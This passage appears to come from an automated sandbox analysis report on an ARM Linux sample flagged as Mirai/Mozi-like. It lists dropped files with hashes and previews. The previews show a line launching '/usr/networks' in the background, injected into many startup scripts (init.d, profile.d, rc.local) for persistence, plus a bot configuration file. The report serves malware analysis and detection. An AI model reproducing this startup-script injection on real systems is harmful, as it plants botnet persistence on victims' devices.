                                                                                                                                SHA-512:1C25B93B523688ACB3DF72B8EC148CD736CD479E7BEF3655DBCDB0B6D1AFACB652492ECF81A21EBADEBBFF14D0B20916DFD639E93EE1CCD6454C61F38BCAE46D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountall.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):148
                                                                                                                                Entropy (8bit):4.74526082342869
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4iLirKM0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4ierX0Voo+v7n
                                                                                                                                MD5:44D9E997053B704B17DB7DD64563014E
                                                                                                                                SHA1:1A29A3E927426D001FD0627C244B2397CF62D6C6
                                                                                                                                SHA-256:56B70518A2C51841B3C7BC5DDBAFC2AF62F4A47B25A1147A929E1129CBCBFAC7
                                                                                                                                SHA-512:B16AC50C36C5C17D405D2D8A1E9DB7D9863578EB71F4C382C56C4AA4BCEAEE6D4558A8CB94505464A1F13BA980741F5BE8CBD134C425004AA260DAC8F52B1581
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountdevsubfs.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):56
                                                                                                                                Entropy (8bit):4.1427249051134325
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                                MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                                SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                                SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                                SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountkernfs.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):56
                                                                                                                                Entropy (8bit):4.1427249051134325
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                                MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                                SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                                SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                                SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountnfs-bootclean.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):249
                                                                                                                                Entropy (8bit):4.8916208864241355
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4il/2ii0Voo+v7n:AGKE3fdARMsBLbPrTn
                                                                                                                                MD5:515975B77B7985776BC03B8F5C029EFE
                                                                                                                                SHA1:AA8F2AD5CB736EDC9BA0AEAE0748257E16875C11
                                                                                                                                SHA-256:DFD458AE245B70CB759F3FF40FB22BDFD520E627DABAF813C1D9BCA2C8155E00
                                                                                                                                SHA-512:169DC8DDF26C9F3A50C29D0F2AB99AF20D4F949F2F034AC25914086ED0DE37610D310F034E20B6493195E1BB54DC3036EB5BC999099D74ED53FFC813DED5FAD2
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountnfs-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountnfs.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):190
                                                                                                                                Entropy (8bit):3.788938232230384
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVx5jWvFFFvNsTREKdKCvFF/pN1uFFFveYd3LrLl7jWvFFFvzv3Hv0VOORgn:a5qvFFhNsTR/3/hN4/Zdd75qvFFhzfv7
                                                                                                                                MD5:B09350F021B2B102B1E328A988261F3E
                                                                                                                                SHA1:93AD761BD0E1EBB3E9BDCAA469EC0192C0C9DA4F
                                                                                                                                SHA-256:E78EED19CCD5853AF3518FB3A16BE3244BE503798218041D65E5B44A0829A020
                                                                                                                                SHA-512:1DB35C4F8A6584FAC6AB3B0789B4037F09557457B248443489D5EDD2A6B34DB59735B3256F905D45075199DD870E52FFDBCC7E8DD85006BD1F85F8000F61FF8A
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&. exit 3. ;;. stop|status). # No-op. ;;. *). echo "Usage: $0 start|stop" >&2. exit 3. ;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/umountnfs.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):145
                                                                                                                                Entropy (8bit):4.730534942677594
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZ/ZHM4hWRJ7Fru4fR3dM0FJOUsZoG3Hv0VOORgn:eogJ7hu4pC0Voo+v7n
                                                                                                                                MD5:60F4E3C6C61EF7FA36BC5B00FF234698
                                                                                                                                SHA1:8AC881752B54BDB8FBD831A67AF6ED8CB2989B65
                                                                                                                                SHA-256:9DBFF8DF724717101900B6289BDB73EB05D67D4A14170EB3D26B20686F851F7F
                                                                                                                                SHA-512:741D35617E8C3B5D1278CB83C11BFBA1B6110B17D7E251DABA10EAC30BBAD8C5064F0EB7AF236EEEA9383E78C8E3F2DE477598763A5A1B7F213D606DF1F1D6D7
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;. stop|"")..do_stop..;;. *)..echo "Usage: umountnfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/profile.d/Z97-byobu.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/profile.d/apps-bin-path.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/profile.d/bash_completion.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/profile.d/cedilla-portuguese.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/profile.d/vte-2.91.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/rc.local
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOOR3n:M
                                                                                                                                MD5:CCE237822A14795B1B5946EAE141691B
                                                                                                                                SHA1:420CE3F920BB02962978255ADDCBF975D4014A3A
                                                                                                                                SHA-256:D9C831E4480DBAAB813BF5BE1BCE6C64CFA4F4320038022E2051BD4E8E4D76DF
                                                                                                                                SHA-512:24A86C9C9944068E3FE6000687E6D392F6587556601E09A22399D15B588536883547B326F13BE506BE492C2269F69AA2DCEDE4FBA8847664793847C74AD5EFF6
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 0.
                                                                                                                                /etc/rcS.d/S95baby.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25
                                                                                                                                Entropy (8bit):3.8936606896881854
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:TKH4v0VJ:hK
                                                                                                                                MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                                SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                                SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                                SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                                Malicious:true
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: rIbyGX66Op, Detection: malicious, Browse
                                                                                                                                • Filename: MGuvcs6Ocz, Detection: malicious, Browse
                                                                                                                                • Filename: mozi.a.zip, Detection: malicious, Browse
                                                                                                                                • Filename: bin.sh, Detection: malicious, Browse
                                                                                                                                • Filename: i, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                                                • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                                                • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: bad_file, Detection: malicious, Browse
                                                                                                                                • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                                                • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                                                Preview: #!/bin/sh./usr/networks&.
                                                                                                                                /etc/wpa_supplicant/action_wpa.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):714
                                                                                                                                Entropy (8bit):5.329653855555143
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                                                                                                MD5:DD099D71A60531087FDDED3EBEE8036A
                                                                                                                                SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                                                                                                SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                                                                                                SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                                                                                /etc/wpa_supplicant/functions.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/wpa_supplicant/ifupdown.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3368
                                                                                                                                Entropy (8bit):5.3288648372922625
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                                                                                                MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                                                                                                SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
                                                                                                                                SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                                                                                                SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                                                                                /tmp/.config
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):317
                                                                                                                                Entropy (8bit):4.907338691609266
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/JERaEtMFtbUrQQxXDzraOn3zuTTn/NN:AF+Ftb4HaU3zu8EF+Ftb4HaU3zuzbf
                                                                                                                                MD5:782AD22FB77C8FD8D1B45F440B55D197
                                                                                                                                SHA1:73FAB9C7F4B8E3339997598A25A7D7D581800596
                                                                                                                                SHA-256:DF8F20A8FD27238420D34B79EEA793AD788C9CBA3D1BFD42E79D964EC2BCD3DA
                                                                                                                                SHA-512:5C95FB5548571F98164602EEA2E7F8C861FF351609D5AA2E971D68877968D1EBD05AB68D6AFC6D467B0C2323D2E1AA84BA8341FAB116C69E4F5D6622B1CEC74A
                                                                                                                                Malicious:false
                                                                                                                                Preview: 2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]32770.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]1619016288.[rn]GET[/rn][sv]0[/sv]
                                                                                                                                /usr/bin/gettext.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1914
                                                                                                                                Entropy (8bit):4.829445473341419
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                                                                                MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                                                                                SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                                                                                SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                                                                                SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                                                                                /usr/networks
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):307960
                                                                                                                                Entropy (8bit):5.819679405566689
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                                MD5:EEC5C6C219535FBA3A0492EA8118B397
                                                                                                                                SHA1:292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
                                                                                                                                SHA-256:12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
                                                                                                                                SHA-512:3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth
                                                                                                                                • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Metadefender, Detection: 54%, Browse
                                                                                                                                • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                Preview: .ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....
                                                                                                                                /usr/sbin/alsa-info.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25983
                                                                                                                                Entropy (8bit):5.455683610707543
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:AhYCrncz9NJ20iuYwj9hkinrV8a0cvxo5sLG:Evrncz9NJGrwj9hkinrV8aHgsLG
                                                                                                                                MD5:9DEFBAA753E5A9E5620E466E81715A35
                                                                                                                                SHA1:751D0F882BE1494064C68A074DA5DC1CE599A349
                                                                                                                                SHA-256:A8E3C858BE59F3DC8811EC7979F347FD07D7213089E5E3A1BD5BA7AFBBA1CE9C
                                                                                                                                SHA-512:24851711C125FB277844B0AEE501A25EC2ED797417FFFF6F862793E24F07B94DF227DB54938728FBED1A711C74D84A7E86599BE248BC173387406BAC27F4E64F
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ -s "$SHFILE" -a "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been u
                                                                                                                                /usr/share/alsa-base/alsa-info.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25464
                                                                                                                                Entropy (8bit):5.453877096685684
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                                                                                MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                                                                                SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                                                                                SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                                                                                SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                                                                                /usr/share/alsa/utils.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4725
